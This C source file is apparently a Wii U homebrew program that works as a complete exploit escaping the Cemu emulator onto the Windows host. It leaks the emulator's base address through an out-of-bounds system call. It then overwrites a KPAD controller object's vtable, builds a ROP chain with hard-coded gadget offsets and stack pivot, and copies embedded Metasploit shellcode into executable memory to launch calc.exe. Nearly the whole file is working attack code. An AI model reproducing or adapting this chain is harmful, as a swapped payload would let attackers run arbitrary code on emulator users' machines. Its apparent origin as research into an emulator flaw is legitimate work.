#include <coreinit/core.h>
#include <coreinit/debug.h>
#include <coreinit/thread.h>
#include <coreinit/foreground.h>
#include <coreinit/filesystem.h>
#include <coreinit/screen.h>
#include <coreinit/memory.h>
#include <proc_ui/procui.h>
#include <sysapp/launch.h>

bool isAppRunning = true;

void
SaveCallback()
{
   OSSavesDone_ReadyToRelease(); // Required
}

bool
AppRunning()
{
   if(!OSIsMainCore())
   {
      ProcUISubProcessMessages(true);
   }
   else
   {
      ProcUIStatus status = ProcUIProcessMessages(true);
    
      if(status == PROCUI_STATUS_EXITING)
      {
          // Being closed, deinit, free, and prepare to exit
          isAppRunning = false;
          ProcUIShutdown();
      }
      else if(status == PROCUI_STATUS_RELEASE_FOREGROUND)
      {
          // Free up MEM1 to next foreground app, deinit screen, etc.
          ProcUIDrawDoneRelease();
      }
      else if(status == PROCUI_STATUS_IN_FOREGROUND)
      {
         // Executed while app is in foreground
      }
   }

   return isAppRunning;
}

uint64_t _SYSGetSystemApplicationTitleId(uint32_t index);
uint32_t KPADSetConnectCallback(uint32_t index,uint32_t value);

int
CoreEntryPoint(int argc, char **argv)
{
	// ConnectCallback array: 0x14091A608
	// KPAD object pointers start at 0x140925818
	// Structure:
	// 0: uint64_t must be > 0
	// 8: unk
	// 16: vtable ptr
	// after that: we don't care
	// nice scratch space at 0x140928300
	// (stuff around here is used as space to write some hardcoded utf16-le strings too, and this is after the space the last string is written to)
	
	#define ARRAY_START 0x91A608
	#define KPAD_START 0x925818
	#define SCRATCH_SPACE 0x928300
	//#define OFFSET_FROM_BASE_ADDRESS_TO_INFOLEAK 0x95b38 // index 37 calling infoleak the first time
	#define OFFSET_FROM_BASE_ADDRESS_TO_INFOLEAK 0x514128 // index 52 after another infoleak
	#define OUR_KPAD_VTABLE_PTR SCRATCH_SPACE + 104
	#define OUR_KPAD_VTABLE_START SCRATCH_SPACE + 60
	
	#define KPAD_START_IDX ((KPAD_START - ARRAY_START) / 4)
	#define OUR_KPAD_VTABLE_PTR_IDX ((OUR_KPAD_VTABLE_PTR - ARRAY_START) / 4)
	#define OUR_KPAD_VTABLE_START_IDX ((OUR_KPAD_VTABLE_START - ARRAY_START) / 4)
	#define ROP_CHAIN_IDX (OUR_KPAD_VTABLE_PTR_IDX + 4)
	
	// shellcode from metasploit, windows/x64/exec.
	const char shellcode[] = "\xFC\x48\x83\xE4\xF0\xE8\xC0\x00\x00\x00\x41\x51\x41\x50\x52\x51"
							"\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52"
							"\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0"
							"\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED"
							"\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x8B\x80\x88"
							"\x00\x00\x00\x48\x85\xC0\x74\x67\x48\x01\xD0\x50\x8B\x48\x18\x44"
							"\x8B\x40\x20\x49\x01\xD0\xE3\x56\x48\xFF\xC9\x41\x8B\x34\x88\x48"
							"\x01\xD6\x4D\x31\xC9\x48\x31\xC0\xAC\x41\xC1\xC9\x0D\x41\x01\xC1"
							"\x38\xE0\x75\xF1\x4C\x03\x4C\x24\x08\x45\x39\xD1\x75\xD8\x58\x44"
							"\x8B\x40\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44\x8B\x40\x1C\x49"
							"\x01\xD0\x41\x8B\x04\x88\x48\x01\xD0\x41\x58\x41\x58\x5E\x59\x5A"
							"\x41\x58\x41\x59\x41\x5A\x48\x83\xEC\x20\x41\x52\xFF\xE0\x58\x41"
							"\x59\x5A\x48\x8B\x12\xE9\x57\xFF\xFF\xFF\x5D\x48\xBA\x01\x00\x00"
							"\x00\x00\x00\x00\x00\x48\x8D\x8D\x01\x01\x00\x00\x41\xBA\x31\x8B"
							"\x6F\x87\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x41\xBA\xA6\x95\xBD\x9D\xFF"
							"\xD5\x48\x83\xC4\x28\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47"
							"\x13\x72\x6F\x6A\x00\x59\x41\x89\xDA\xFF\xD5" "calc.exe";
	
	// leak the cemu.exe base address
	// doing it this way seems to be more reliable than "just" getting the return address off the stack?
	_SYSGetSystemApplicationTitleId(0);
	uint64_t BaseAddress = _SYSGetSystemApplicationTitleId(52) - OFFSET_FROM_BASE_ADDRESS_TO_INFOLEAK;
	
	// make sure the kpad ptr here is NULL, we don't want calls happening whilst we're still writing.
	KPADSetConnectCallback(KPAD_START_IDX,0);
	KPADSetConnectCallback(KPAD_START_IDX + 1,0);
	
	// overwrite the vtable of the kpad object
	KPADSetConnectCallback(KPAD_START_IDX + 4,((BaseAddress + OUR_KPAD_VTABLE_PTR) & 0xffffffff) );
	KPADSetConnectCallback(KPAD_START_IDX + 5,((BaseAddress + OUR_KPAD_VTABLE_PTR) >> 32) );
	KPADSetConnectCallback(OUR_KPAD_VTABLE_PTR_IDX,((BaseAddress + OUR_KPAD_VTABLE_START) & 0xffffffff) );
	KPADSetConnectCallback(OUR_KPAD_VTABLE_PTR_IDX + 1,((BaseAddress + OUR_KPAD_VTABLE_START) >> 32) );
	
	// prep our ROPchain! :)
	// ...
	// 0x140516628 => ptr to rwx memory ;)
	// 0x14028B2C0 => memcpy
	// 0x140518720 => ptr to emulated RAM
	//uint64_t host_shellcode_ptr = BaseAddress + 0x518720 + &shellcode;
	// 0x00000001400012d2 : pop rcx ; ret
	KPADSetConnectCallback(ROP_CHAIN_IDX,((BaseAddress + 0x12d2) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 1,((BaseAddress + 0x12d2) >> 32) );
	// rcx points to *(emulated RAM)
	KPADSetConnectCallback(ROP_CHAIN_IDX + 2,((BaseAddress + 0x518720) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 3,((BaseAddress + 0x518720) >> 32) );
	// 0x0000000140004377 : mov rax, qword ptr [rcx] ; ret
	KPADSetConnectCallback(ROP_CHAIN_IDX + 4,((BaseAddress + 0x4377) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 5,((BaseAddress + 0x4377) >> 32) );
	// 0x0000000140001035 : pop rbx ; ret
	KPADSetConnectCallback(ROP_CHAIN_IDX + 6,((BaseAddress + 0x1035) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 7,((BaseAddress + 0x1035) >> 32) );
	// rbx: address of shellcode inside emu
	KPADSetConnectCallback(ROP_CHAIN_IDX + 8,(uint32_t)(&shellcode) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 9,0 );
	// 0x0000000140148eec : add rax, rbx ; add rsp, 0x20 ; pop rbx ; ret
	KPADSetConnectCallback(ROP_CHAIN_IDX + 10,((BaseAddress + 0x148eec) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 11,((BaseAddress + 0x148eec) >> 32) );
	// stack filler 32 bytes
	KPADSetConnectCallback(ROP_CHAIN_IDX + 12,0x41414141);
	KPADSetConnectCallback(ROP_CHAIN_IDX + 13,0x41414141);
	KPADSetConnectCallback(ROP_CHAIN_IDX + 14,0x41414141);
	KPADSetConnectCallback(ROP_CHAIN_IDX + 15,0x41414141);
	KPADSetConnectCallback(ROP_CHAIN_IDX + 16,0x41414141);
	KPADSetConnectCallback(ROP_CHAIN_IDX + 17,0x41414141);
	KPADSetConnectCallback(ROP_CHAIN_IDX + 18,0x41414141);
	KPADSetConnectCallback(ROP_CHAIN_IDX + 19,0x41414141);
	// rbx: not needed right now // TODO: use it?
	KPADSetConnectCallback(ROP_CHAIN_IDX + 20,0x41414141);
	KPADSetConnectCallback(ROP_CHAIN_IDX + 21,0x41414141);
	// 0x0000000140001120 : pop rdi ; ret
	KPADSetConnectCallback(ROP_CHAIN_IDX + 22,((BaseAddress + 0x1120) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 23,((BaseAddress + 0x1120) >> 32) );
	// rdi points to: 0x0000000140001120 : pop rdi ; ret
	KPADSetConnectCallback(ROP_CHAIN_IDX + 24,((BaseAddress + 0x1120) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 25,((BaseAddress + 0x1120) >> 32) );
	// 0x000000014025c7bd : mov rcx, rax ; call rdi
	KPADSetConnectCallback(ROP_CHAIN_IDX + 26,((BaseAddress + 0x25c7bd) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 27,((BaseAddress + 0x25c7bd) >> 32) );
	// 0x0000000140030a32 : pop rax ; ret
	KPADSetConnectCallback(ROP_CHAIN_IDX + 28,((BaseAddress + 0x30a32) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 29,((BaseAddress + 0x30a32) >> 32) );
	// rax points to: 0x0000000140001030 : ret
	KPADSetConnectCallback(ROP_CHAIN_IDX + 30,((BaseAddress + 0x1030) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 31,((BaseAddress + 0x1030) >> 32) );
	// 0x00000001402b52ef : mov rdx, rcx ; mov rcx, r9 ; jmp rax
	KPADSetConnectCallback(ROP_CHAIN_IDX + 32,((BaseAddress + 0x2b52ef) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 33,((BaseAddress + 0x2b52ef) >> 32) );
	// rdx now contains &shellcode
	// 0x00000001400012d2 : pop rcx ; ret
	KPADSetConnectCallback(ROP_CHAIN_IDX + 34,((BaseAddress + 0x12d2) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 35,((BaseAddress + 0x12d2) >> 32) );
	// rcx points to *(rwx ram)
	KPADSetConnectCallback(ROP_CHAIN_IDX + 36,((BaseAddress + 0x516628) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 37,((BaseAddress + 0x516628) >> 32) );
	// 0x0000000140004377 : mov rax, qword ptr [rcx] ; ret
	KPADSetConnectCallback(ROP_CHAIN_IDX + 38,((BaseAddress + 0x4377) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 39,((BaseAddress + 0x4377) >> 32) );
	// 0x0000000140001120 : pop rdi ; ret
	KPADSetConnectCallback(ROP_CHAIN_IDX + 40,((BaseAddress + 0x1120) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 41,((BaseAddress + 0x1120) >> 32) );
	// rdi points to: 0x0000000140001120 : pop rdi ; ret
	KPADSetConnectCallback(ROP_CHAIN_IDX + 42,((BaseAddress + 0x1120) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 43,((BaseAddress + 0x1120) >> 32) );
	// 0x000000014025c7bd : mov rcx, rax ; call rdi
	KPADSetConnectCallback(ROP_CHAIN_IDX + 44,((BaseAddress + 0x25c7bd) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 45,((BaseAddress + 0x25c7bd) >> 32) );
	// rcx points to rwx ram :)
	// 0x00000001401730d0 : pop r8 ; ret
	KPADSetConnectCallback(ROP_CHAIN_IDX + 46,((BaseAddress + 0x1730d0) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 47,((BaseAddress + 0x1730d0) >> 32) );
	// r8 contains sizeof(shellcode)
	KPADSetConnectCallback(ROP_CHAIN_IDX + 48,sizeof(shellcode) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 49,0 );
	// call memcpy 0x14028B2C0
	KPADSetConnectCallback(ROP_CHAIN_IDX + 50,((BaseAddress + 0x28B2C0) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 51,((BaseAddress + 0x28B2C0) >> 32) );
	// get *(rwx ram) back into a register and jump to it
	// 0x00000001400012d2 : pop rcx ; ret
	KPADSetConnectCallback(ROP_CHAIN_IDX + 52,((BaseAddress + 0x12d2) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 53,((BaseAddress + 0x12d2) >> 32) );
	// rcx points to *(rwx ram)
	KPADSetConnectCallback(ROP_CHAIN_IDX + 54,((BaseAddress + 0x516628) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 55,((BaseAddress + 0x516628) >> 32) );
	// 0x0000000140004377 : mov rax, qword ptr [rcx] ; ret
	KPADSetConnectCallback(ROP_CHAIN_IDX + 56,((BaseAddress + 0x4377) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 57,((BaseAddress + 0x4377) >> 32) );
	// 0x000000014000bbbe : jmp rax
	KPADSetConnectCallback(ROP_CHAIN_IDX + 58,((BaseAddress + 0xbbbe) & 0xffffffff) );
	KPADSetConnectCallback(ROP_CHAIN_IDX + 59,((BaseAddress + 0xbbbe) >> 32) );
	
	
	// set up the stack pivot gadgets
	// 0x000000014015d404 : add rcx, 0x10 ; jmp qword ptr [rax]
	// 0x0000000140228371 : push rcx ; pop rsp ; ret
	KPADSetConnectCallback(OUR_KPAD_VTABLE_START_IDX,((BaseAddress + 0x228371) & 0xffffffff) );
	KPADSetConnectCallback(OUR_KPAD_VTABLE_START_IDX + 1,((BaseAddress + 0x228371) >> 32) );
	KPADSetConnectCallback(OUR_KPAD_VTABLE_START_IDX + 8,((BaseAddress + 0x15d404) & 0xffffffff) );
	KPADSetConnectCallback(OUR_KPAD_VTABLE_START_IDX + 9,((BaseAddress + 0x15d404) >> 32) );
	
	
	// switch the kpad object on ;)
	KPADSetConnectCallback(KPAD_START_IDX,1);
	// make the vtable call
	KPADSetConnectCallback(0,0);
   return argc;
}

int
main(int argc, char **argv)
{
   ProcUIInit(&SaveCallback);
   CoreEntryPoint(argc,argv);
   
   for(;;) ;
}
